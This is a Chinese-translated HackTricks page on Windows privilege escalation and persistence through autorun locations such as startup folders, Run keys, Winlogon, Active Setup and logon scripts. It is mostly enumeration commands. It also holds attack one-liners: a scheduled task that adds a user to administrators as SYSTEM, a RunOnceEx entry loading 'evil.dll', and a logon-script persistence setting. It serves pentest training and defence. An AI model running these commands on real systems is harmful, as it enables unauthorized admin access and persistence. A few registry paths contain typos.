HackTricks
使用 Autoruns 进行 Privilege Escalation
Tip
学习并实践 AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
学习并实践 GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
学习并实践 Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
支持 HackTricks
- 查看 订阅方案!
- 加入 💬 Discord 群组、telegram 群组,关注 X/Twitter 上的 @hacktricks_live,或查看 LinkedIn 页面 和 YouTube 频道。
- 通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR,分享 hacking 技巧。
WMIC
Wmic 可用于在 startup 时运行程序。查看哪些 binaries 被编程为在 startup 时运行:
wmic startup get caption,command 2>nul & ^
Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
计划任务
Tasks 可以被安排以 certain frequency 运行。查看哪些 binaries 被安排运行:
schtasks /query /fo TABLE /nh | findstr /v /i "disable deshab"
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
#Schtask to give admin access
#You can also write that content on a bat file that is being executed by a scheduled task
schtasks /Create /RU "SYSTEM" /SC ONLOGON /TN "SchedPE" /TR "cmd /c net localgroup administrators user /add"
文件夹
位于 Startup folders 中的所有 binary 都会在 startup 时执行。常见的 startup folders 是下面列出的这些,但 startup folder 是在 registry 中指定的。Read this to learn where.
dir /b "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 2>nul
dir /b "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 2>nul
dir /b "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul
dir /b "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul
Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup"
Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
FYI: Archive extraction path traversal vulnerabilities (such as the one abused in WinRAR prior to 7.13 – CVE-2025-8088) can be leveraged to 将 payload 直接投放到这些 Startup folders 内,在解压期间完成写入, resulting in code execution on the next user logon. For a deep-dive into this technique see:
Archive Extraction Path Traversal
Registry
Tip
Note from here: The Wow6432Node registry entry indicates that you are running a 64-bit Windows version. The operating system uses this key to display a separate view of HKEY_LOCAL_MACHINE\SOFTWARE for 32-bit applications that run on 64-bit Windows versions.
Runs
Commonly known AutoRun registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunHKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceHKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunHKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceHKCU\Software\Microsoft\Windows\CurrentVersion\RunHKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceHKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunHKCU\Software\Wow6432Npde\Microsoft\Windows\CurrentVersion\RunOnceHKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunHKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunonceHKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunonceEx
Registry keys known as Run and RunOnce are designed to automatically execute programs every time a user logs into the system. The command line assigned as a key’s data value is limited to 260 characters or less.
Service runs (can control automatic startup of services during boot):
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnceHKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnceHKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesHKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesHKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnceHKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnceHKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesHKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices
RunOnceEx:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceExHKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceEx
On Windows Vista and later versions, the Run and RunOnce registry keys are not automatically generated. Entries in these keys can either directly start programs or specify them as dependencies. For instance, to load a DLL file at logon, one could use the RunOnceEx registry key along with a “Depend” key. This is demonstrated by adding a registry entry to execute “C:\temp\evil.dll” during the system start-up:
reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d "C:\\temp\\evil.dll"
Tip
Exploit 1: 如果你可以写入 HKLM 中提到的任何 registry,那么当其他用户登录时,你可以提升权限。
Tip
Exploit 2: 如果你可以覆盖 HKLM 中任何 registry 指示的任意 binaries,那么你可以在其他用户登录时将该 binary 修改为带有 backdoor 的版本,并提升权限。
#CMD
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunE
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices
reg query HKCU\Software\Wow5432Node\Microsoft\Windows\CurrentVersion\RunServices
reg query HKLM\Software\Microsoft\Windows\RunOnceEx
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\RunOnceEx
reg query HKCU\Software\Microsoft\Windows\RunOnceEx
reg query HKCU\Software\Wow6432Node\Microsoft\Windows\RunOnceEx
#PowerShell
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunE'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\RunOnceEx'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\RunOnceEx'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\RunOnceEx'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\RunOnceEx'
Startup Path
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell FoldersHKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
放在 Startup 文件夹中的快捷方式会在用户登录或系统重启时自动触发服务或应用程序启动。Startup 文件夹的位置在注册表中为 Local Machine 和 Current User 两个范围定义。这意味着,添加到这些指定 Startup 位置中的任何快捷方式,都会确保关联的服务或程序在登录或重启过程后启动,使其成为一种安排程序自动运行的直接方法。
Tip
如果你能覆盖 HKLM 下的任何 [User] Shell Folder,你就可以把它指向一个由你控制的文件夹,并放入一个后门;任何用户登录系统时它都会执行,从而提升权限。
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v "Common Startup"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v "Common Startup"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v "Common Startup"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v "Common Startup"
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' -Name "Common Startup"
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders' -Name "Common Startup"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders' -Name "Common Startup"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' -Name "Common Startup"
UserInitMprLogonScript
HKCU\Environment\UserInitMprLogonScript
这个按用户划分的 registry value 可以指向一个 script 或 command,它会在该用户 logon 时执行。它主要是一个 persistence 原语,因为它只在受影响用户的上下文中运行,但在 post-exploitation 和 autoruns reviews 中仍然值得检查。
Tip
如果你能为当前用户写入这个 value,你可以在下次交互式 logon 时重新触发执行,而不需要 admin rights。如果你能为另一个用户 hive 写入它,当该用户 logon 时,你可能获得 code execution。
reg query "HKCU\Environment" /v "UserInitMprLogonScript"
reg add "HKCU\Environment" /v "UserInitMprLogonScript" /t REG_SZ /d "C:\Users\Public\logon.bat" /f
reg delete "HKCU\Environment" /v "UserInitMprLogonScript" /f
Get-ItemProperty -Path 'Registry::HKCU\Environment' -Name "UserInitMprLogonScript"
Set-ItemProperty -Path 'Registry::HKCU\Environment' -Name "UserInitMprLogonScript" -Value 'C:\Users\Public\logon.bat'
Remove-ItemProperty -Path 'Registry::HKCU\Environment' -Name "UserInitMprLogonScript"
Notes:
- 优先使用目标用户已可读的
.bat、.cmd、.ps1或其他 launcher files 的完整路径。 - 只要该值未被移除,这种方式会在 logoff/reboot 后持续存在。
- 与
HKLM\...\Run不同,这种方式本身不会带来 elevation;它只是 user-scope persistence。
Winlogon Keys
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
通常,Userinit key 设置为 userinit.exe。然而,如果该 key 被修改,指定的 executable 也会在用户 logon 时由 Winlogon 启动。同样,Shell key 预期指向 explorer.exe,它是 Windows 的默认 shell。
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Userinit"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Shell"
Tip
如果你可以覆盖 registry 值或 binary,你将能够提升 privileges。
Policy Settings
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerHKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
检查 Run key。
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "Run"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "Run"
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer' -Name "Run"
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer' -Name "Run"
AlternateShell
更改 Safe Mode Command Prompt
在 Windows Registry 的 HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot 下,有一个默认设置为 cmd.exe 的 AlternateShell 值。这意味着当你在启动时选择“Safe Mode with Command Prompt”(按 F8)时,会使用 cmd.exe。但也可以把电脑配置为自动以这种模式启动,而不需要按 F8 手动选择。
创建一个用于自动以“Safe Mode with Command Prompt”启动的 boot 选项的步骤:
- 更改
boot.ini文件的属性,移除只读、系统和隐藏标志:attrib c:\boot.ini -r -s -h - 打开
boot.ini进行编辑。 - 插入一行类似这样的内容:
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect /SAFEBOOT:MINIMAL(ALTERNATESHELL) - 保存对
boot.ini的更改。 - 重新应用原始文件属性:
attrib c:\boot.ini +r +s +h
- Exploit 1: 修改 AlternateShell registry key 允许设置自定义命令 shell,可能被用于未授权访问。
- Exploit 2 (PATH Write Permissions): 如果对 system PATH 变量的任何部分具有写权限,尤其是在
C:\Windows\system32之前,就可以执行自定义cmd.exe,这在系统以 Safe Mode 启动时可能成为后门。 - Exploit 3 (PATH and boot.ini Write Permissions): 对
boot.ini的写访问可启用自动 Safe Mode 启动,从而在下一次重启时促成未授权访问。
要检查当前的 AlternateShell 设置,请使用这些命令:
reg query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot /v AlternateShell
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot' -Name 'AlternateShell'
Installed Component
Active Setup 是 Windows 中的一项功能,它会在桌面环境完全加载之前就启动。它优先执行某些命令,而这些命令必须在用户登录继续之前完成。这个过程甚至会早于其他启动项触发,例如 Run 或 RunOnce 注册表项中的那些。
Active Setup 通过以下注册表键进行管理:
HKLM\SOFTWARE\Microsoft\Active Setup\Installed ComponentsHKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed ComponentsHKCU\SOFTWARE\Microsoft\Active Setup\Installed ComponentsHKCU\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components
在这些键中,存在多个子键,每个子键对应一个特定组件。值得关注的键值包括:
- IsInstalled:
0表示组件的命令不会执行。1表示该命令会为每个用户执行一次,如果缺少IsInstalled值,默认行为也是这样。- StubPath: 定义由 Active Setup 执行的命令。它可以是任何有效的命令行,例如启动
notepad。
Security Insights:
- 修改或写入某个
IsInstalled设置为"1"且带有特定StubPath的键,可能导致未授权命令执行,从而潜在实现 privilege escalation。 - 在任何
StubPath值所引用的二进制文件上进行修改,也可能在具备足够权限的情况下实现 privilege escalation。
要检查 Active Setup 各组件中的 StubPath 配置,可以使用这些命令:
reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components" /s /v StubPath
reg query "HKCU\SOFTWARE\Microsoft\Active Setup\Installed Components" /s /v StubPath
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components" /s /v StubPath
reg query "HKCU\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components" /s /v StubPath
Browser Helper Objects
Browser Helper Objects (BHOs) 概述
Browser Helper Objects (BHOs) 是为 Microsoft Internet Explorer 添加额外功能的 DLL 模块。它们会在每次启动时加载到 Internet Explorer 和 Windows Explorer 中。不过,可以通过将 NoExplorer 键设置为 1 来阻止它们执行,从而防止它们随 Windows Explorer 实例加载。
BHOs 通过 Internet Explorer 11 兼容 Windows 10,但不受 Microsoft Edge 支持,Microsoft Edge 是较新版本 Windows 中的默认浏览器。
要查看系统中注册的 BHOs,可以检查以下注册表项:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper ObjectsHKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
每个 BHO 都在注册表中由其 CLSID 表示,作为唯一标识符。有关每个 CLSID 的详细信息可以在 HKLM\SOFTWARE\Classes\CLSID\{<CLSID>} 下找到。
要在注册表中查询 BHOs,可以使用以下命令:
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /s
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /s
Internet Explorer Extensions
HKLM\Software\Microsoft\Internet Explorer\ExtensionsHKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions
注意,registry 会为每个 dll 包含 1 个新的 registry 项,并且它将由 CLSID 表示。你可以在 HKLM\SOFTWARE\Classes\CLSID\{<CLSID>} 中找到 CLSID 信息
Font Drivers
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font DriversHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers"
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers'
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers'
Open Command
HKLM\SOFTWARE\Classes\htmlfile\shell\open\commandHKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command
reg query "HKLM\SOFTWARE\Classes\htmlfile\shell\open\command" /v ""
reg query "HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command" /v ""
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Classes\htmlfile\shell\open\command' -Name ""
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command' -Name ""
图像文件执行选项
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKLM\Software\Microsoft\Wow6432Node\Windows NT\CurrentVersion\Image File Execution Options
SysInternals
注意,所有可以找到 autoruns 的位置都已经被 winpeas.exe 搜索过了。不过,如果你想要一份更全面的自动执行文件列表,可以使用 systinternals 的 autoruns :
autorunsc.exe -m -nobanner -a * -ct /accepteula
更多
在 https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2 中查找更多类似 Autoruns 的注册表项
参考
- https://resources.infosecinstitute.com/common-malware-persistence-mechanisms/#gref
- https://attack.mitre.org/techniques/T1547/001/
- https://attack.mitre.org/techniques/T1037/001/
- https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2
- https://www.itprotoday.com/cloud-computing/how-can-i-add-boot-option-starts-alternate-shell
- https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-04-03-2026
Tip
学习并实践 AWS Hacking:
学习并实践 GCP Hacking:
学习并实践 Az Hacking:支持 HackTricks
- 查看 订阅方案!
- 加入 💬 Discord 群组、telegram 群组,关注 X/Twitter 上的 @hacktricks_live,或查看 LinkedIn 页面 和 YouTube 频道。
- 通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR,分享 hacking 技巧。